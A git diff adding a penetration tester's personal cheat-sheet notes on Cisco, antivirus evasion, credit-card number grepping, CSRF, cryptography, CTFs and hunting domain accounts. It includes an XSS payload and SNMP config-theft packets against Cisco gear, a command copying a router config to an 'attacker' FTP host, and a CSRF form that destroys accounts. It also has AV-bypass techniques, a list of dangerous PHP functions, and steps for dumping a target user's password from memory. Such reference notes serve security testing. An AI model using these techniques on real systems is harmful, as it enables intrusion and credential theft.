+
+    r.content = re.sub('</title>', blah, r.content, 1, re.I)
+    r.normalise()
+  return r
+
+
+conf.ip = '192.168.122.1'
+conf.ssl_verify = None
+
+ru_bypass_ssl = (lambda x: x.method == "CONNECT", "l")
+ru_forward_all = (lambda x: x.method != "CONNECT", "f")
+
+p(rules=(ru_bypass_ssl, ru_forward_all), verbose=1, pre_func=pre, post_func=post)
+or
+p(rules=(ru_forward_all,))
+
+# converting utf-16 to utf-8
+
+def pre(r):
+  if 'Wide' in r.get_header('string-format'):
+    r.remove_header('String-Format')
+    r.content = r.raw_content = r.raw_content.replace('\x00', '')
+    r.update_content_length()
+  return r
diff --git a/Cheat Sheet/bypass_av b/Cheat Sheet/bypass_av
new file mode 100644
index 0000000..2a47d22
--- /dev/null
+++ b/Cheat Sheet/bypass_av	
@@ -0,0 +1,61 @@
+# bypass antivirus av evasion
+
+* bypass static heuristic and dynamic analysis
+decrypt payload: http://www.sevagas.com/?Hide-meterpreter-shellcode-in
+fool sandbox: http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf
+hundred million increments or malloc 100mb
+know your enemy (write/read file in home user dir)
+what the fuck is NUMA
+what is my name
+first open a mutex
+
+https://github.com/govolution/avepoc
+http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/
+https://samsclass.info/124/proj14/p8-av.htm
+
+* try ditto
+http://www.room362.com/blog/2012/10/8/compiling-and-release-of-ditto.html
+
+* python exe
+http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
+http://carnal0wnage.attackresearch.com/2011/07/process-injection-outside-of-metasploit.html
+https://www.trustedsec.com/august-2012/new-tool-pyinjector-released-python-shellcode-injection/ (ya meme l'option dans SET: http://www.hackingarticles.in/bypassing-antivirus-using-multi-pyinjector-shellcode-injection-in-set-toolkit/)
+http://pauldotcom.com/wiki/index.php/Episode333
+https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/ (http://www.reddit.com/r/netsec/comments/1fc2xp/veil_a_metasploit_payload_generator_for_bypassing/)
+http://pen-testing.sans.org/blog/pen-testing/2013/07/12/anti-virus-evasion-a-peek-under-the-veil
+
+* powershell to spawn meterpreter
+http://obscuresecurity.blogspot.fr/2013/03/powersploit-metasploit-shells.html
+
+* metastploit psexec_command (when AV blocks metasploit service)
+Doesnt upload a metasploit binary for the service but use the cmd.exe of the compromised server instead. Only allows to run a single Windows command
+
+* metasm
+http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
+
+* hyperion
+marche pas pour PE64
+wce32 marche pas sur windows x64
+donc utiliser hyperion.exe sur wce universal
+virustotal: detecte par symantec, kaspersky, panda, comodo, antivir // pas detecte par mcafee, sophos, trendmicro, microsoft, clamav, avg, avast
+
+* pescrambler
+les versions scrambled de wce64 ou de wceUni ne s'executent meme pas
+c'est probablement win32 only
+
+* veil
+powershell/VirtualAlloc + un payload de msfvenom
+
+* powershell
+utiliser PowerSploit/Invoke-Shellcode avec un payload meterpreter
+j'arrive pas a faire marcher Invoke-ReflectivePEInjection avec wce.exe (ou calc.exe) probablement pas encore entierement supporte
+Invoke-Mimikatz fonctionne mais c'est une vielle version de mimikatz modifiee et recompilee en dll, de plus la dll est probablement injectee dans lsass
+
+* packers
+MPRESS
+
+* excluded antivirus locations
+msf post/windows/gather/enum_av_excluded
+
+* Dr0p1t Framework
+https://github.com/D4Vinci/Dr0p1t-Framework
diff --git a/Cheat Sheet/cc b/Cheat Sheet/cc
new file mode 100644
index 0000000..b961cc8
--- /dev/null
+++ b/Cheat Sheet/cc	
@@ -0,0 +1,27 @@
+# credit card numbers
+
+panhunt
+
+try this with grep:
+^(?:4[0-9]{12}(?:[0-9]{3})?          # Visa
+ |  5[1-5][0-9]{14}                  # MasterCard
+ |  3[47][0-9]{13}                   # American Express
+ |  3(?:0[0-5]|[68][0-9])[0-9]{11}   # Diners Club
+ |  6(?:011|5[0-9]{2})[0-9]{12}      # Discover
+ |  (?:2131|1800|35\d{3})\d{11}      # JCB
+)$
+
+https://stripe.com/docs/testing
+http://www.paypalobjects.com/en_US/vhelp/paypalmanager_help/credit_card_numbers.htm
+http://creditcardjs.com/credit-card-type-detection
+https://github.com/NetSPI/PS_CC_Checker
+https://github.com/eelsivart/SearchForCC (has some grep REs)
+
+CC numbers:
+less: [^0-9][3456][0-9]\{3\}[[:space:]-]*[0-9]\{4\}[[:space:]-]*[0-9]\{4\}[[:space:]-]*[0-9]\{4\}[^0-9]
+grep -Eo '[^0-9][3456][0-9]{3}[[:space:]-]*[0-9]{4}[[:space:]-]*[0-9]{4}[[:space:]-]*[0-9]{4}[^0-9]'
+
+track data:
+grep -Eo '[3-6][0-9]{15}=[0-9]{20}?'
+
+
diff --git a/Cheat Sheet/cdrecord b/Cheat Sheet/cdrecord
new file mode 100644
index 0000000..c88977b
--- /dev/null
+++ b/Cheat Sheet/cdrecord	
@@ -0,0 +1,4 @@
+# cdrecord
+
+cdrecord dev=/dev/cdrom blank=fast -v
+cdrecord gracetime=2 dev=/dev/cdrom -raw -v path/to/image.iso
diff --git a/Cheat Sheet/cert b/Cheat Sheet/cert
new file mode 100644
index 0000000..f6c013b
--- /dev/null
+++ b/Cheat Sheet/cert	
@@ -0,0 +1,8 @@
+# cert, csirt, first
+
+Computer Emergency Response Team
+Computer Security Incident Response Team 
+Forum of Incident Response and Security Teams
+
+cert ou csirt, c'est la meme chose.
+first: liste de tous les CERT du monde (http://www.first.org/about/organization/teams/index.html)
diff --git a/Cheat Sheet/cert-prisv2 b/Cheat Sheet/cert-prisv2
new file mode 100644
index 0000000..75dcc3b
--- /dev/null
+++ b/Cheat Sheet/cert-prisv2	
@@ -0,0 +1,3 @@
+# prisv2
+
+http://bao.dgme.fr/InterfaceBV/interface.do
diff --git a/Cheat Sheet/cheatsheets b/Cheat Sheet/cheatsheets
new file mode 100644
index 0000000..25c35a6
--- /dev/null
+++ b/Cheat Sheet/cheatsheets	
@@ -0,0 +1,6 @@
+# cheatsheets
+
+http://zeltser.com/cheat-sheets/
+http://packetlife.net/library/cheat-sheets/
+
+https://www.owasp.org/index.php/Cheat_Sheets
diff --git a/Cheat Sheet/checkpoint b/Cheat Sheet/checkpoint
new file mode 100644
index 0000000..7f4c19b
--- /dev/null
+++ b/Cheat Sheet/checkpoint	
@@ -0,0 +1,11 @@
+# checkpoint
+
+# build history (latest build number?)
+http://hlncc.com/resources/check_point_build_history.php
+
+# checkpoint firewall-1 aka vpn-1 + howto ike-scan
+http://www.nta-monitor.com/wiki/index.php/Check_Point_Firewall-1
+
+# port 264/tcp recuperation de la topologie
+http://www.securiteam.com/securitynews/5HP0D2A4UC.html (/usr/share/exploits/packetstormexploits/0107-exploits/sr.pl)
+perl ~/Documents/private/checkpoint-fw1-topology.pl fw.example.com
diff --git a/Cheat Sheet/cisco b/Cheat Sheet/cisco
new file mode 100644
index 0000000..c0a5e26
--- /dev/null
+++ b/Cheat Sheet/cisco	
@@ -0,0 +1,136 @@
+# cisco
+
+https://github.com/nccgroup/cisco-SNMP-enumeration
+
+# rce / vault7
+https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ https://github.com/artkond/cisco-rce/
+
+# EXTRABACON (CVE-2016-6366) + EPICBANANA (CVE-2016-6367) + BANAL* etc.
+https://www.ixiacom.com/company/blog/equation-groups-firewall-exploit-chain
+
+# heap overflow CVE-2016-1287
+https://blog.exodusintel.com/
+
+# Cisco Small Business 220 Series Smart Plus (Sx220) Switches
+snmp auth bypass due to hardcoded community string http://www.synacktiv.com/ressources/advisories_cisco_switch_sg220_default_snmp.pdf
+
+# get version of Cisco ASA OS
+/admin/exec/show+version
+
+./net-analyzer/vomit/vomit-0.2c.ebuild:DESCRIPTION="Converts a Cisco IP phone conversation into a wav file"
+enable.c # bruteforce enable
+
+# http-default-accounts.nse
+  name = "Cisco 2811",
+  category = "routers",
+  paths = {
+    {path = "/exec/show/log/CR"},
+    {path = "/level/15/exec/-/configure/http"},
+    {path = "/level/15/exec/-"},
+    {path = "/level/15/"}
+  },
+  login_combos = {
+    {username = "", password = ""},
+    {username = "cisco", password = "cisco"}
+
+telnet est dispo depuis toutes les VRF (et non la VRF par defaut contrairement à ce que alain croyait)
+Donc il FAUT mettre une access-list sur le VTY sinon on peut faire telnet depuis Internet.
+Et aussi pourrir son syslog (port UDP en ecoute)
+
+# vulns
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2009-002/?fid=3764
+
+# Comment savoir si le routeur est synchronisé par NTP et que ça marche bien ?
+# Faire un show clock et si ya un '.' en debut de ligne alors ça veut dire que
+# ya pas NTP ou que ya NTP mais que ça marche pas.
+.14:56:11.739 CET Thu Jun 11 2009
+
+# outil d'analyse des regles de filtrage Cisco
+http://runplaybook.com/p/11
+
+# download cisco config via snmp rw community
+pull config: send(IP(src="http://github.com/10.200.0.77", dst="192.168.99.207")/UDP(dport=161)/SNMP(community="private",PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.2.1.55.192.168.98.57"),value="pwnd-router.config")])))
+push config: send(IP(src="http://github.com/10.200.0.77", dst="192.168.99.207")/UDP(dport=161)/SNMP(community="private",PDU=SNMPset(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.2.1.53.192.168.98.57"),value="pwnd-router.config")])))
+also see msf
+
+# decoding type 7 (vigenere cipher from 16th century)
+cisco# conf t
+cisco(config)# key chain thisisatest
+cisco(config-keychain)# key 1
+cisco(config-keychain)# key-string 7 0539030E2D405725490B10220A1F173D24362C72
+cisco(config-keychain)# ctrl+z
+cisco# show key chain
+Key-chain thisisatest:
+    key 1 -- text "ReallyL0ngPassword!"
+
+cisco# conf t
+cisco(config)# no key chain thisisatest
+cisco(config-keychain)# ctrl+z
+
+# vieux clients
+https://helpdesk.ugent.be/vpn/en/akkoord.php
+
+# afficher config avec passwords en clair // http://www.cisco.com/c/en/us/support/docs/security/pix-500-series-security-appliances/82076-preshared-key-recover.html
+more system:running-config # au lieu de show run
+ou
+http://10.0.0.1/config
+ou
+copy running-config ftp://attacker/running-config
+
+# Cisco ASA vulns
+-- xss
+/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=%22%20style%3dbehavior%3aurl(http://github.com/%23default%23time2)%20onbegin%3dalert(1)%20blah&status=0&username=&password_min=0&state=&tgroup=&serverType=0&password_days=0
+
+-- Jonathan Claudius https://speakerdeck.com/claudijd/crowdsourcing-your-cisco-firewall-administration-dot-dot-dot-wat
+CVE-2014-2126 CVE-2014-2127
+* http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa
+
+-- ruxcon 2014
+* http://denraelevisgniht.blogspot.co.nz/2014/10/cisco-asa-clientless-ssl-vpn.html
+* http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa
+CVE-2014-3391 jailbreak method 1
+CVE-2014-3390 jailbreak method 2
+CVE-2014-3393 preview to change login page
+CVE-2014-3389 run commands on standby unit
+CVE-2014-3398 find standby unit with /CSCOSSLC/config-auth discloses fw version
+
+The login page of the WebVPN portal can be customized (eg. change company logo, font, colors etc.) via the ASDM interface which is normally not accessible from the Internet, as opposed to the WebVPN portal which is accessible to everyone.
+The researcher found that these customization functions can actually be accessed through the WebVPN portal as well.
+CVE-2014-3393: authentication bypass vulnerability: attacker can access the customization functions (preview & save) without authentication, and change the login page to steal user creds. (only pre-condition IIRC is the preview directory must be already created ie. someone must have used the preview function before)
+CVE-2014-3389: as an unprivileged SSL user, attacker can send packets to the standby firewall without authentication to run commands as user enable_15 (root).
+CVE-2014-3398: find the ASA standby firewall by scanning for /CSCOSSLC/config-auth, which also discloses the firmware version. (e.g. 9.1(2) is vuln)
+Attacker creates user on the standby firewall, login to standby and run commands on the active firewall.
+Attacker adds NAT rules to be able to access sensitive internal servers without triggering IDS or having to compromise “pivot” hosts.
+CVE-2014-339[01]: two ways to escape from the Cisco shell to /bin/sh as root in order to install rootkit and hide the NAT rules.
+
+
+To be exploitable, there is an important condition:
+- The preview button must have been clicked at least once since the ASA booted. (ie. after the ASA is restarted the preview button has to be clicked again).
+
+To click the preview button, the victim must have created a new customization object (which can simply be done by exporting Template and re-importing it), clicked on Edit and finally clicked on the Preview button (see preview-button.png).
+ 
+If this has never been done then the ASA returns a HTTP 200 in response to the first POST request. Otherwise it’s a HTTP 302 redirect to a preview of the new page. The first 3 requests create the preview, the 4th request saves the changes.
+ 
+A “safe check” would therefore be to simply issue the first 3 requests, and if we get a 302 to the first request and our arbitrary payload is included in the HTML response to the 3rd request, then it’s very likely vulnerable.
+
+To be easily exploitable, there is an important condition:
+- The default customization object “DfltCustomization” must still be in use.
+ 
+Specifically, if the client created a new customization object to have a customized login page, then obviously the attacker will need to guess the name of this new customization object to be able to alter the login page (by default the exploit references “DfltCustomization”). However assuming the attacker successfully guesses it, it will be quite difficult to revert to the original page.
+
+On the other hand, if the client created a new customization object but didn’t assign any profile, then the login page still uses DfltCustomization and the attacker can alter the login page.
+
+Some important notes:
+• The change does not survive a restart unless someone saves the running configuration.
+• Attacker can revert to a sane login page by running the exploit with a stock DfltCustomization. Strangely though the lab’s ASA login page is different than a stock DfltCustomization.
+
+# version leak
+http://carnal0wnage.attackresearch.com/2015/02/cisco-asa-version-grabber-cve-2014-3398.html
+curl -ssl -k  -v "https://1.2.3.4/CSCOSSLC/config-auth"
+
+# Decrypt Cisco Secure Access Control System repository passwords
+http://www.synacktiv.com/ressources/cisco_acs_repo_decrypt.py
+
+# cisco pix password hash format
+passwd 2KFQnbNIdI.2KYOU encrypted => "cisco"
+hashcat -m 2400 pw.hc wordlist.txt
diff --git a/Cheat Sheet/citrix b/Cheat Sheet/citrix
new file mode 100644
index 0000000..7af78d4
--- /dev/null
+++ b/Cheat Sheet/citrix	
@@ -0,0 +1,23 @@
+# citrix
+
+# Transferring files on isolated remote desktop environments using windows messages
+http://www.ampliasecurity.com/research/transferringfilesonisolatedRDenvironments-ampliasecurity.pdf
+tools/gtt (GUI Transfer Toolkit)
+
+# break out
+http://www.pentestpartners.com/Pen-Test-Partners_Breaking-Out-of-Citrix-and-other-Restricted-Desktop-Environments.pdf
+http://synjunkie.blogspot.co.uk/2009/03/abusing-citrix-part-1.html
+
+# http://www.netvoyager.co.uk/kb/?num=2
+Citrix ICA Clients use the following ports:
+
+Session TCP port 1494
+Session Reliability TCP port 2598
+Web Services TCP port 80 
+
+# enum apps
+./nmap --script citrix-enum-apps 10.0.0.1 -sU -p 1604 citrix-enum-apps-xml doesnt seem to work
+./nmap --script citrix-enum-servers 10.0.0.1 -sU -p 1604
+
+./nmap --script citrix-enum-apps-xml 10.0.0.1 -p8000 (need to modify .nse if Citrix Metaframe ICA Browser is on different port than the hard-coded 80,443,8080)
+./nmap --script citrix-enum-servers-xml 10.0.0.1 -p8000 
diff --git a/Cheat Sheet/cloud b/Cheat Sheet/cloud
new file mode 100644
index 0000000..aa79627
--- /dev/null
+++ b/Cheat Sheet/cloud	
@@ -0,0 +1,7 @@
+# cloud
+
+# shell in ze cloud
+https://console.cloud.google.com/cloudshell
+
+# identify real IP of CloudFlare
+https://github.com/HatBashBR/HatCloud
diff --git a/Cheat Sheet/coldfusion b/Cheat Sheet/coldfusion
new file mode 100644
index 0000000..8353aef
--- /dev/null
+++ b/Cheat Sheet/coldfusion	
@@ -0,0 +1,23 @@
+# coldfusion
+
+# famous LFIs
+http://www.blackhatlibrary.net/Coldfusion_hacking
+
+# lfi2shell in versions 6 to 10
+http://hatriot.github.io/blog/2014/04/02/lfi-to-stager-payload-in-coldfusion/
+
+# home-made reversible encrypted passwords in cf6
+http://ringzer0team.com/paper/10/ColdFusion-MX6-admin-password-decryptor
+
+# more
+http://www.ampliasecurity.com/research.html
+http://hexale.blogspot.com/2009/10/how-to-decrypt-coldfusion-v6-datasource.html
+http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html 
+http://jumpespjump.blogspot.com.au/2014/03/attacking-adobe-coldfusion.html
+http://www.infointox.net/?p=59 
+http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ 
+http://www.securiteam.com/tools/5ZP0B00FPG.html
+http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
+
+# version disclosure
+CFIDE/adminapi/administrator.cfc?method=getBuildNumber
diff --git a/Cheat Sheet/conficker b/Cheat Sheet/conficker
new file mode 100644
index 0000000..d5ac908
--- /dev/null
+++ b/Cheat Sheet/conficker	
@@ -0,0 +1,5 @@
+# conficker (downadup, kido)
+
+# information, detection, suppression
+http://www.dshield.org/conficker
+dernier article SANS: http://isc.sans.org/diary.html?storyid=7195 (2009-10-01)
diff --git a/Cheat Sheet/confluence b/Cheat Sheet/confluence
new file mode 100644
index 0000000..c5efdfd
--- /dev/null
+++ b/Cheat Sheet/confluence	
@@ -0,0 +1,3 @@
+# confluence
+
+is based on struts and therefore vuln to past OGNL vulns (http://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts)
diff --git a/Cheat Sheet/corelan b/Cheat Sheet/corelan
new file mode 100644
index 0000000..e2c2b22
--- /dev/null
+++ b/Cheat Sheet/corelan	
@@ -0,0 +1,25 @@
+# corelan
+
+# /GS
+stack cookie only if a variable is a string (so no stack cookie if e.g. structure like with the ANI exploit)
+
+# SafeSEH
+
+# SEHOP
+
+# DEP
+Since Windows XP SP2 and 2003 SP1
+Software DEP == Safeseh
+Hardware DEP == NX/XD
+
+bypass options:
+ret2libc
+ZwProtectVirtualMemory
+NtSetInformationProcess (disable for the process)
+
+# ASLR
+Since Vista
+
+bypass options:
+partial EIP overwrite
+use non-aslr loaded module
diff --git a/Cheat Sheet/crypto b/Cheat Sheet/crypto
new file mode 100644
index 0000000..aae35c0
--- /dev/null
+++ b/Cheat Sheet/crypto	
@@ -0,0 +1,68 @@
+# crypto
+
+# pkcs structures
+http://www.cem.me/pki/index.html
+
+# tools
+CrypTool
+CryptoCrack
+https://gchq.github.io/CyberChef/
+
+# great resources
+http://crypto.interactive-maths.com/
+http://practicalcryptography.com/cryptanalysis/
+http://rumkin.com/tools/cipher/
+http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html (aes well explained)
+
+# Forward Secrecy.
+With this feature enabled, each connection uses separate encryption keys, which means that the encrypted data remains safe if the server private key is compromised.
+
+# wordpress cookie
+cookie: $username|$expiry|$hmac
+key = wp_hash($username . $expiration) # based on wordpress SECRET_KEY
+hash_hmac('md5', $username . $expiry, $key) == $hmac
+following values will generate same hash:
+admin1 1353464343
+admin  11353464343
+
+# hash length extension
+https://blog.whitehatsec.com/hash-length-extension-attacks/
+http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack/
+https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks
+
+Given an application that prepends a secret to a string before hashing it, the application is vulnerable if an attacker knows both the string and the hash. The attacker is able to append extra information to the original string and still generate a valid hash from it without knowing the secret. In a query, the extra data that is appended is given preference over the original data.
+
+https://github.com/stephenbradshaw/hlextend
+https://github.com/bwall/HashPump
+https://github.com/iagox86/hash_extender
+
+# substitution ciphers
+* monoalphabetic
+caesar/rot: for i in {0..25}; do echo "Ackkmaa" |  /usr/games/bin/caesar $i ; done
+* polyalphabetic
+vigenere
+autokey
+porta (13 alphabet instead of 26 like vigenere)
+...
+anagram
+online cryptogram solver: http://quipqiup.com/
+google SCBSolver
+best results with tools/crypto/practicalcryptography.com/*.py (e.g. tools/crypto/pygenere's VigCrack.crack_codeword fails when ciphertext too small)
+
+# transposition cipher
+scytale
+rail fence
+route
+columnar transposition (break_coltrans.py) unlikely if there are no many vowels
+
+# xortool
+github.com/hellman/xortool: use -c 00 for encrypted binaries, -c ' ' for texts (sometimes fails to find correct xor key)
+
+# XORsearch
+https://blog.didierstevens.com/?s=xorsearch
+
+# ADVGVX
+ciphertext only consists of these letters
+
+# scrambler
+if the algo is cyclic, keep running the ciphertext through the scramler until output makes sense
diff --git a/Cheat Sheet/csrf b/Cheat Sheet/csrf
new file mode 100644
index 0000000..f7c1fd6
--- /dev/null
+++ b/Cheat Sheet/csrf	
@@ -0,0 +1,31 @@
+# csrf
+
+# multi-post csrf trick
+http://www.lanmaster53.com/2013/07/multi-post-csrf/
+
+# for easy Proof of concept
+https://github.com/PaulSec/CSRFT
+http://homakov.github.io
+
+# simple post avec javascript
+http://inj3ct0r.com/exploits/5999
+
+# basic or digest auth
+# pour que l'utilisateur ne remarque pas de popup d'erreur si le csrf echoue
+http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
+
+# xmlhttprequest (l'instanciation n'est pas la meme sous FF ou IE)
+http://www.openjs.com/articles/ajax_xmlhttp_using_post.php
+
+# harmless
+<a href="http://www.harmless.com/" onclick="
+  var f = document.createElement('form');
+  f.style.display = 'none';
+  this.parentNode.appendChild(f);
+  f.method = 'POST';
+  f.action = 'http://www.example.com/account/destroy';
+  f.submit();
+  return false;">To the harmless survey</a>
+
+# sonar (automatic scanning and fingerprint of internal hosts and delivering csrf exploits)
+http://thehackerblog.com/sonar-a-framework-for-scanning-and-exploiting-internal-hosts-with-a-webpage/
diff --git a/Cheat Sheet/ctfs b/Cheat Sheet/ctfs
new file mode 100644
index 0000000..0c6d70c
--- /dev/null
+++ b/Cheat Sheet/ctfs	
@@ -0,0 +1,50 @@
+# ctfs
+
+# defcon ctf
+https://github.com/legitbs/quals-2013
+https://github.com/legitbs/finals-2013
+http://fuzyll.com/2016/the-defcon-ctf-vm/
+
+# writes-ups & archives
+http://repo.shell-storm.org/CTF/
+
+# competitions
+https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions
+
+# other ctfs
+http://map.ipviking.com/
+http://wargame.kr:8084/
+http://www.overthewire.org/wargames/
+http://io.smashthestack.org:84/
+http://pwnable.kr
+http://pwnable.tw
+http://ringzer0team.com
+http://microcorruption.com/
+
+http://www.reddit.com/r/securityCTF
+https://ctftime.org/event/list/upcoming/
+
+http://captf.com/practice-ctf/
+http://ctf.forgottensec.com/wiki/index.php?title=Main_Page
+
+# pointers
+https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions
+http://pentest.cryptocity.net/capture-the-flag/
+
+# complete list
+http://www.felipemartins.info/2011/05/pentesting-vulnerable-study-frameworks-complete-list/
+
+# bf pw of crackmes by counting numb of instructions
+https://github.com/wagiro/pintool
+
+# CTF frameworks, tools, libraries, resources, softwares and tutorials
+https://github.com/apsdehal/awesome-ctf
+
+# platforms
+ctfd.io (csaw), mellivora (9447) and ictf
+picoCTF, EasyCTF, tinyctf-platform
+http://github.com/facebook/fbctf
+https://www.reddit.com/r/securityCTF/comments/3sgi52/looking_for_a_ctf_platformframework/
+https://github.com/mitre-cyber-academy/ctf-scoreboard
+TJCTF https://github.com/TJCSec/ctf-platform
+IceCTF improved TJCTF a lot https://github.com/IceCTF/ColdCore
diff --git a/Cheat Sheet/cvs b/Cheat Sheet/cvs
new file mode 100644
index 0000000..f7e07dd
--- /dev/null
+++ b/Cheat Sheet/cvs	
@@ -0,0 +1,39 @@
+# cvs
+
+# pour lister tous les modules
+mkdir tmp && cd tmp
+mkdir CVS
+echo '.' > CVS/Repository
+echo '' > CVS/Entries
+
+cvs update -dp
+
+# faire un checkout de tout
+/usr/bin/cvs co .
+
+# supprimer un fichier
+rm file.c
+cvs remove file.c
+# supprimer des fichiers
+rm *.c
+cvs remove
+
+# supprimer un repertoire
+cvs commit
+cd ..
+cvs remove mydir
+rm -fr mydir
+
+# recuperer une ancienne version
+cvs update -p -r 1.202 filename > filename
+
+# gentoo
+mkdir /tmp/oldff && cd /tmp/odlff
+rsync -r rsync://anonvcs.gentoo.org/vcs-public-cvsroot/gentoo-x86/www-client/mozilla-firefox-bin .
+export CVSROOT=/tmp/oldff
+cvs init
+mkdir /tmp/cvsco && /tmp/cvsco
+cvs checkout mozilla-firefox-bin
+cvs log
+cd mozilla-firefox-bin
+cvs up -Pd -D 2009-08-10
diff --git a/Cheat Sheet/cvss b/Cheat Sheet/cvss
new file mode 100644
index 0000000..9f0edb1
--- /dev/null
+++ b/Cheat Sheet/cvss	
@@ -0,0 +1,3 @@
+# cvss
+
+http://www.first.org/cvss/cvss-guide.html
diff --git a/Cheat Sheet/dangerous_php_functions b/Cheat Sheet/dangerous_php_functions
new file mode 100644
index 0000000..d91d05e
--- /dev/null
+++ b/Cheat Sheet/dangerous_php_functions	
@@ -0,0 +1,71 @@
+alter_ini
+apache_child_terminate
+apache_getenc
+apache_get_modules
+apache_get_version
+apache_note
+apache_request_headers
+apache_setenv
+copy
+diskfreespace
+disk_free_space
+dl
+escapeshellarg
+escapeshellcmd
+eval
+exec
+expect_popen
+fgetcsv
+fpassthru
+fputcsv
+fsockopen
+ftp_connect
+ftp_ssl_connect
+get_current_user
+getmypid
+getmyuid
+getrusage
+highlight_file
+ini_alter
+ini_get_all
+link
+max_execution_time
+openlog
+parse_ini_file
+passthru
+pfsockopen
+phpinfo
+pnctl_exec
+popen
+posix_kill
+posix_mkfifo
+posix_setpgid
+posix_setsid
+posix_setuid
+proc_close
+proc_get_status
+proc_nice
+proc_open
+proc_terminate
+putenv
+register_shutdown_function
+register_tick_function
+rename
+set_include_path
+set_time_limit
+shell_exec
+show_source
+socket_accept
+socket_bind
+socket_connect
+socket_create_listen
+socket_getpeername
+socket_listen
+socket_send
+symlink
+syslog
+system
+tmpfile
+touch
+virtual
+preg_
diff --git a/Cheat Sheet/db2 b/Cheat Sheet/db2
new file mode 100644
index 0000000..cd642b3
--- /dev/null
+++ b/Cheat Sheet/db2	
@@ -0,0 +1,4 @@
+# db2
+
+# sqli cheatsheet
+http://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/
diff --git a/Cheat Sheet/dbus b/Cheat Sheet/dbus
new file mode 100644
index 0000000..95fbaa9
--- /dev/null
+++ b/Cheat Sheet/dbus	
@@ -0,0 +1,3 @@
+# dbus
+
+https://github.com/taviso/dbusmap
diff --git a/Cheat Sheet/debian_openssl b/Cheat Sheet/debian_openssl
new file mode 100644
index 0000000..5871372
--- /dev/null
+++ b/Cheat Sheet/debian_openssl	
@@ -0,0 +1,24 @@
+# debian openssl
+http://wiki.debian.org/SSLkeys
+
+# if a good DSA key was used on a bad machine, the key is compromised
+
+# http://wiki.debian.org/SSLkeys
+"the vulnerability is fixed in version 0.9.8c-4etch3 for etch and version 0.9.8g-9 for lenny/sid"
+
+# applications/protocols impacted
+pwsafe, debian based PKI, etc
+
+# tools to detect weak keys
+./debian_ssh_scan_v4.py 1.2.3.4
+cat ip_list.txt | ./debian_ssh_scan_v4.py
+dowkb.pl
+{ssl,openvpn,ssh}-vulnkey
+ssh-keyscan victim.domain.org | ssh-vulnkey
+
+# source
+http://itsecurity.net/ (debian_ssh_scan_v4.py)
+http://metasploit.com/users/hdm/tools/debian-openssl/ (weak keys generation)
+https://hdm.io/tools/debian-openssl/
+https://github.com/g0tmi1k/debian-ssh
+http://wiki.yobi.be/wiki/Debian_OpenSSL
diff --git a/Cheat Sheet/digvip b/Cheat Sheet/digvip
new file mode 100644
index 0000000..73b7fe3
--- /dev/null
+++ b/Cheat Sheet/digvip	
@@ -0,0 +1,99 @@
+# digvip
+
+How to hunt a domain account
+
+# Overview
+So you are domain admin on the corporate domain and you have dumped the password hashes of everyone, BUT your password cracking skills are not strong enough to recover the password of your point of contact.
+
+Your best bet is probably to track down the IP address of the workstation(s) where your VIP is currently logged-on, remotely connect to these machines with domain admin privileges and dump his password in clear-text from the Windows system's memory.
+
+As every logon events on the domain is recorded in the domain controller's event logs, the best way to identify this list of IPs is to directly ask the domain controller for it.
+## Event Logs
+```
+Version                       | Log Format | Default location
+---------------------------------------------------------------------------------
+Windows 2003 and earlier      | EVT        | %windir%\system32\config\*.evt
+Windows Vista/2008 and later  | EVTX       | %windir%\system32\winevt\logs\*.evtx
+```
+Double check the actual settings though (location, max size ...), read HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security.
+
+## Tools
+Non-exhaustive list of tools to query Windows event logs:
+```
+* PsLogList
+CLI
+By Sysinternals
+Can read EVT or EVTX event logs
+Can read remote computers
+
+* wevtutil
+CLI
+Shipped by default with Windows Visa/2008/7
+Can only read EVTX event logs
+Can read remote computers
+
+* EventQuery.VBS
+CLI
+Shipped by default with Windows 2003 and earlier
+Can read remote computers
+http://technet.microsoft.com/en-us/library/bb490900.aspx
+
+* Eventvwr.msc snap-in 
+GUI
+Could not make the "save all events" feature work
+
+* samba
+CLI
+Could not make rpcclient(1) or net(1) work
+
+* samba-tng
+CLI
+To try
+
+* Write your own vbscript to speak to WMI
+CLI
+Can read remote computers
+http://msdn.microsoft.com/en-us/library/aa394593%28v=vs.85%29.aspx
+To try
+
+* Write your own Powershell script to speak to WinRM
+CLI
+Write a powershell script that will remotely query event logs via the Windows Remote Management service
+Can read EVT or EVTX event logs
+Can read remote computers
+The WinRM service must be running to use remote powershell commands (it is by default)
+https://github.com/obscuresec/PowerShell/blob/master/Find-NTLMNetworkLogon works but firewall must allow access to the event log service (port 49153 ?) which does not seem to be the case after my default install of a w2k8 domain controller.
+To try
+```
+Non-exhaustive list of tools to parse Windows event logs:
+```
+* python-evtx
+http://www.williballenthin.com/evtx/
+Only supports the EVTX format
+
+* evtexport
+http://code.google.com/p/libevt
+Only supports the EVT format
+
+* evtxexport
+http://code.google.com/p/libevtx/
+Only supports the EVTX format
+```
+## Demo
+Logon events are recorded in the <em>Security</em> event log.
+
+Use PsLogList to remotely extract logon-related events from the domain controller's <em>Security</em> event log:
+```
